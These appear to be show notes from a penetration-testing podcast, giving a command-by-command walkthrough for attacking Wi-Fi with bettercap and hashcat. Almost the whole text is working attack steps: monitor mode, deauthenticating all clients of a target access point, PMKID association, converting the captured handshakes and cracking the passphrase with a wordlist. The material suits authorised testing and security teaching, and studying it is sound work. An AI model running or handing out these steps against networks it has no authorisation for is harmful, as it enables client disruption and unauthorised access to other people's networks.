7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2
2 min read

7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process:

# In ESXI, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC"

# Kill processes on the Kali VM that might screw stuff up:
airmon-ng check kill

# Start monitoring on the wifi card:
sudo airmon-ng start wlan0

# Start bettercap
sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0

# Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function):
set wifi.handshakes.file /root/captures.pcap

# Set wifi.deauth acquired to true (optional).  What I found during testing is that I would capture a lot of "half" handshakes but never the full ones.  After reading this Github issue (https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes!
set wifi.deauth.acquired true

# Get wifi recon going!
wifi.recon on 

# Sort networks by # of clients connected 
set wifi.show.sort clients desc

# Every second, clear out our view and then present an updated list of nearby WiFi networks:
set ticker.commands 'clear; wifi.show'

# Filter out client probes
events.ignore wifi.client.probe

# Filter out client disconnections
events.ignore wifi.client.lost

# Filter out new APs that come online
events.ignore wifi.ap.new

# Filter out new clients that come online
events.ignore wifi.client.new

# Filter out lost connections with APs
events.ignore wifi.ap.lost

# Show networks that ONLY start with 7MS:
set wifi.show.filter ^7MS

# Turn on ticker
ticker on

# Set channel to the one you're attacking
wifi.recon.channel X

# Disassociate all clients on a given BSSID to capture handshakes!
wifi.deauth 11:22:33:44:55:66

# Assoc with target SSID to do the PKMID attack
wifi.assoc all
wifi.assoc 11:22:33:44:55:66

# Clear SSID filter
set wifi.show.filter ^

# Clear wifi.recon.channel filter
wifi.recon.channel clear

# Figure out the container ID for bettercap
sudo docker ps

# Copy files from docker to hd!  First, make note of the ID (noted with "XXX" below).  If you didn't change the default path, you should be able to see captured files in the /root folder.  Try listing them with:
sudo docker exec XXX ls /root/

# Now you can copy them out of the docker and into your current folder:
sudo docker cp XXX:/root/captures.pcap .

# Convert .pcap files to hccapx files:
sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx

# Crack w/hashcat!
sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt

# If this doesn't work ^^^, it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html).  In that case, here's what I did on the pcap itself to get it ready for hashcat:
sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap

# Crack with hashcat!
sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt